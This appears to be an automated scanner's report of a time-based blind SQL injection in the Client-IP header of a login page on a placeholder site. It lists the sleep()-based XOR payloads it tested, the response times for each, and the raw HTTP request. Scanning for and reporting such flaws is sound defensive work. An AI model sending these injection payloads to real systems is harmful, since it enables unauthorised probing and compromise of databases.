The vulnerability affects http://www.site.com/login.php , Client-IP Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script Attack details HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z Tests performed: 0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765 0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756 0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718 HTTP request GET /login.php HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z